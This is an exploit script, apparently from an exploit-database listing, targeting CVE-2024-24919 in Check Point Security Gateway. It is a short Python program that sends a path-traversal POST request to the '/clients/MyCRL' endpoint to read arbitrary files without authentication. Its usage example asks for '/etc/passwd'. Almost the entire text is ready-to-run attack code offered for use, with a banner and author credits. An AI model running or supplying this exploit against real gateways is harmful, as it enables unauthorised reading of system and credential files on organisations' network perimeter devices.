Share
## https://sploitus.com/exploit?id=PACKETSTORM:178872
# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)  
# Exploit Author: Yesith Alvarez  
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336  
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20   
# CVE : CVE-2024-24919  
  
from requests import Request, Session  
import sys  
import json  
  
  
  
def title():  
print('''  
  
_______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___   
/ ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \   
| | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |  
| | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, |  
| |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / /   
\_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/   
  
  
  
  
Author: Yesith Alvarez  
Github: https://github.com/yealvarez  
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/  
''')   
  
def exploit(url, path):  
url = url + '/clients/MyCRL'  
data = "aCSHELL/../../../../../../../../../../.."+ path  
headers = {   
'Connection': 'keep-alive',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'  
}  
s = Session()  
req = Request('POST', url, data=data, headers=headers)  
prepped = req.prepare()  
#del prepped.headers['Content-Type']  
resp = s.send(prepped,  
verify=False,  
timeout=15  
)   
print(prepped.headers)  
print(url)  
print(resp.headers)  
print(resp.status_code)  
  
  
if __name__ == '__main__':  
title()  
if(len(sys.argv) < 3):  
print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))  
print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))   
exit(0)  
else:  
exploit(sys.argv[1],sys.argv[2])